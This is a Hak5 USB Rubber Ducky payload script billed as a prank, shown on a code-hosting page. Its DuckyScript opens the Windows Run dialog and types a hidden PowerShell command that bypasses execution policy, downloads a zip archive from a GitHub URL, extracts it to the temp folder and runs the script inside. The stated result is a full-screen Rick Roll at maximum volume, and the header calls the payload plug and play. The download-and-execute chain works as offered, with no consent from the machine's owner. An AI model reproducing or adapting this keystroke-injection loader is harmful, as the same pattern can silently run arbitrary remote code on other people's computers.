Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/prank/-RD-ADV-RickRoll/ADV-RickRoll.txt
2968 views
1
REM Title: ADV-RickRoll
2
3
REM Author: I am Jakoby
4
5
REM Description: This is a one liner payload that will Rick Roll your target. Video will be played a full screen and max volume.
6
REM Upon deployment payload will pause until a mouse movement is detected and run once one is.
7
8
REM Target: Windows 10, 11
9
10
REM --------------------------------------------------------------------------------------
11
REM THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.
12
REM --------------------------------------------------------------------------------------
13
14
DELAY 2000
15
GUI r
16
DELAY 500
17
STRING powershell -w h -NoP -NonI -Exec Bypass $U='https://github.com/I-Am-Jakoby/I-Am-Jakoby/raw/main/Assets/rr.zip';$Z="$env:TMP"+'\rr.zip';$D="$env:TMP"+'\rr';iwr -Uri $U -O $Z;Expand-Archive $Z -DestinationPath $D\ -Force;powershell $D\rr.ps1
18
ENTER
19
20